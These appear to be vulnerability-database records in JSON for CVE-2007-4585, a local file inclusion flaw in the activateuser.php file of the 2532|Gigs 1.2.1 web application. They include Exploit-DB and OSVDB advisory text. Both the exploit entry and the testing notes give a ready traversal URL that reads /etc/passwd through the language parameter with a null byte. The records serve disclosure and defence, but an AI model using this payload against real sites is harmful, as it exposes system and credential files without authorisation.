{"id": "EDB-ID:4317", "hash": "8bd0fc378f8656671625f84afac47c79", "type": "exploitdb", "bulletinFamily": "exploit", "title": "2532/Gigs 1.2.1 - activateuser.php Local File Inclusion Vulnerability", "description": "2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability. CVE-2007-4585. Webapps exploit for php platform", "published": "2007-08-26T00:00:00", "modified": "2007-08-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4317/", "reporter": "bd0rk", "references": [], "cvelist": ["CVE-2007-4585"], "lastseen": "2016-01-31T20:38:15", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4585"]}, {"type": "osvdb", "idList": ["OSVDB:36687"]}], "modified": "2016-01-31T20:38:15"}, "vulnersScore": 2.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4317/", "sourceData": " -\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0\r\n\r\n 2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability\r\n\r\n Discovered by bd0rk || SOH-Crew\r\n\r\n www.soh-crew.it.tt\r\n\r\n The german Coding and IT-Security Ressource\r\n\r\n -\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0\r\n\r\n\r\nVendor: http://www.2532gigs.com\r\n\r\nDownload: http://belnet.dl.sourceforge.net/sourceforge/gigs-2532/2532Gigs_1.2.1_stable.zip\r\n\r\nLicense: Free\r\n\r\nVulnerable Code: include_once(\"languages/$language/settings.php\");\r\n\r\n\r\n\r\nExploit: http://[h0sT]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00\r\n\r\n\r\n\r\nGreetings: str0ke, TheJT, GolD_M, die steffi, khaliDb, x0r_32\r\n\r\n\r\n####The 18 years old, german Hacker bd0rk####\r\n\r\n# milw0rm.com [2007-08-26]\r\n", "osvdbidlist": ["36687"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-09-29T14:25:29", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in activateuser.php in 2532|Gigs 1.2.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter.", "modified": "2017-09-28T21:29:19", "published": "2007-08-28T21:17:00", "id": "CVE-2007-4585", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4585", "title": "CVE-2007-4585", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off' and the register_globals PHP option is 'on' (not the default setting for PHP since version 4.2.0 / 22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00\n## References:\n[Secunia Advisory ID:26585](https://secuniaresearch.flexerasoftware.com/advisories/26585/)\nOther Advisory URL: http://milw0rm.com/exploits/4317\nISS X-Force ID: 36267\nFrSIRT Advisory: ADV-2007-2968\n[CVE-2007-4585](https://vulners.com/cve/CVE-2007-4585)\nBugtraq ID: 25449\n", "modified": "2007-08-26T00:00:00", "published": "2007-08-26T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:36687", "id": "OSVDB:36687", "title": "2532|Gigs activateuser.php language Variable Traversal Local File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}